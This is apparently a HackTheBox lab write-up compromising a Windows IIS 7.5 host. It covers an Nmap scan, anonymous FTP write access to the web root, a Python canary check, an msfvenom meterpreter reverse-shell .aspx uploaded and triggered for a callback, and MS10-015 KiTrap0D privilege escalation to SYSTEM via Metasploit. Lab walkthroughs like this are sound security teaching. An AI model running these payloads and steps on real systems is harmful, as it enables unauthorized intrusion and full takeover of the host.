Let’s get started
As always, we start with an Nmap scan with service detection:
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 11:42 CET
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM <DIR> aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.45 seconds
From the Nmap results we can see that ports 21 (FTP) and 80 (HTTP) are open, and that the web server is Microsoft IIS 7.5. Two details matter here: anonymous FTP login is allowed, and the FTP root contains exactly the files IIS puts in its default web root (aspnet_client, iisstart.htm, welcome.png). That strongly suggests the FTP root and the IIS web root are the same directory, so anything we can upload over FTP should be served, and if it is an .aspx file, executed, by IIS.
So here is the plan: upload an .aspx reverse shell through FTP, trigger it over HTTP, catch the reverse shell, and then escalate privileges.
ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:ech0): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM <DIR> aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
First, check whether anonymous FTP allows writes by uploading a harmless test file:
ftp> put test.html
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
16 bytes sent in 0.000144 seconds (114 kbytes/s)
As we can see, the FTP file transfer succeeded, so anonymous users can write to the FTP root. Before uploading a payload it is worth confirming that this directory really is the web root by requesting the test file over HTTP (http://10.10.10.5/test.html); if it is served, the .aspx upload will work too.
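The check described above, as an added example that is not part of the original writeup: it parses the MS-DOS style listing for the default IIS wwwroot files, then uploads a random canary over anonymous FTP, fetches it over HTTP, compares the bytes and deletes the canary again. The `FakeSharedRoot` class is an assumption for running offline; the real adapters use only Python's standard library and the host (here 10.10.10.5) is whatever you point them at.

```python
"""Does anonymous FTP write into the IIS web root?

Added example, not code from the original writeup. It assumes only what the
scan showed: anonymous FTP on 21 and IIS on 80 of the same host. Network I/O
is passed in as callables so the logic runs offline against the in-memory
fake at the bottom; the real adapters use only the standard library.
"""
import ftplib
import io
import secrets
import urllib.error
import urllib.request

# Files IIS 7.x places in C:\inetpub\wwwroot on install. Seeing exactly these
# in an FTP listing is a strong hint that the FTP root *is* the web root.
IIS_DEFAULT_WWWROOT = {"aspnet_client", "iisstart.htm", "welcome.png"}

# Directory listing as shown by ftp-anon / "dir" in the writeup (constructed
# here with the column padding Microsoft ftpd actually emits).
SAMPLE_LISTING = [
    "03-18-17  01:06AM       <DIR>          aspnet_client",
    "03-17-17  04:37PM                  689 iisstart.htm",
    "03-17-17  04:37PM               184946 welcome.png",
]


def parse_msdos_listing(lines):
    """Return the file names from MS-DOS style LIST output (Microsoft ftpd).

    Each line is 'MM-DD-YY HH:MMAM  <DIR>|size  name'; maxsplit=3 keeps
    names that contain spaces intact.
    """
    names = set()
    for line in lines:
        parts = line.split(None, 3)
        if len(parts) == 4:
            names.add(parts[3])
    return names


def looks_like_iis_webroot(lines):
    """True when the listing contains the default IIS wwwroot contents."""
    return IIS_DEFAULT_WWWROOT <= parse_msdos_listing(lines)


def canary_check(ftp_put, http_get, ftp_delete):
    """Upload a random marker over FTP, fetch it over HTTP, then clean up.

    Returns True if the bytes served by the web server match the bytes that
    were uploaded, i.e. the anonymous FTP root is reachable over HTTP.
    The marker is deleted even if the HTTP fetch raises.
    """
    name = f"canary-{secrets.token_hex(8)}.txt"   # unguessable, won't clobber anything
    body = secrets.token_hex(16).encode()
    ftp_put(name, body)
    try:
        served = http_get("/" + name)
    finally:
        ftp_delete(name)
    return served == body


# --- real adapters (hypothetical usage: host = "10.10.10.5") -----------------
def ftp_adapters(host, timeout=10):
    """Anonymous login; returns (put, delete, session) bound to one FTP session."""
    ftp = ftplib.FTP(host, timeout=timeout)
    ftp.login()                                  # no args = anonymous login

    def put(name, data):
        ftp.storbinary("STOR " + name, io.BytesIO(data))

    def delete(name):
        ftp.delete(name)

    return put, delete, ftp


def http_getter(host, timeout=10):
    """Returns a callable that GETs a path and yields body bytes, or None on 4xx/5xx."""
    def get(path):
        try:
            with urllib.request.urlopen(f"http://{host}{path}", timeout=timeout) as r:
                return r.read()
        except urllib.error.HTTPError:
            return None
    return get


# --- offline stand-in: a server whose FTP root and web root are the same dir --
class FakeSharedRoot:
    def __init__(self):
        self.files = {}

    def put(self, name, data):
        self.files[name] = data

    def delete(self, name):
        self.files.pop(name, None)

    def get(self, path):
        return self.files.get(path.lstrip("/"))


if __name__ == "__main__":
    print("listing looks like IIS wwwroot:", looks_like_iis_webroot(SAMPLE_LISTING))
    fake = FakeSharedRoot()
    print("canary served over HTTP:", canary_check(fake.put, fake.get, fake.delete))
    print("canary cleaned up:", fake.files == {})
```

Against a live target you would wire the real adapters together: `put, delete, ftp = ftp_adapters("10.10.10.5")`, `canary_check(put, http_getter("10.10.10.5"), delete)`, then `ftp.quit()`. A random file name and a `finally` clause keep the check from leaving artifacts behind even when the HTTP side fails.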
Generating Payload
I’m using msfvenom
to generate the reverse shell payload.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tun0 LPORT=5566 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2824 bytes
With the payload generated, it's time to upload the file to the victim machine via FTP.
ftp> put shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2860 bytes sent in 0.000315 seconds (8.66 Mbytes/s)
Setting up the listener in msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.*.*
msf5 exploit(multi/handler) > set LPORT 5566
LPORT => 5566
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 5566 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
Running the exploit command and then opening http://10.10.10.5/shell.aspx in the browser (IIS compiles and runs the uploaded .aspx) gave me a meterpreter session. Remember to delete shell.aspx from the FTP root once you are done.
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.*.*:5566
[*] Sending stage (180291 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.*.*:5566 -> 10.10.10.5:49158)
meterpreter > getuid
Server username: IIS APPPOOL\Web
The session runs as IIS APPPOOL\Web, the low-privileged application pool identity, so we need to escalate our privileges to NT AUTHORITY\SYSTEM.
Privilege Escalation
For this part we need an exploit suggester, so I used the Metasploit module post/multi/recon/local_exploit_suggester against the session.
Among its suggestions I went with exploit/windows/local/ms10_015_kitrap0d (MS10-015, KiTrap0D) for privilege escalation. Note that it needs its own handler, so set a different LPORT from the one the first session uses.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf5 exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lhost tun0
lhost => tun0
msf5 exploit(windows/local/ms10_015_kitrap0d) > set lport 5577
lport => 5577
msf5 exploit(windows/local/ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on tun0:5577
[*] Launching notepad to host the exploit...
[+] Process 3372 launched.
[*] Reflectively injecting the exploit DLL into 3372...
[*] Injecting exploit into 3372 ...
[*] Exploit injected. Injecting payload into 3372...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.*.*:5577 -> 10.10.10.5:49159)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Getting User.txt
c:\Users\babis\Desktop> type user.txt
**********
Getting Root.txt
c:\Users\Administrator\Desktop> type root.txt
**********
If you like my work, please do consider giving me +rep on HACKTHEBOX.
My HackTheBox profile: https://www.hackthebox.eu/home/users/profile/291968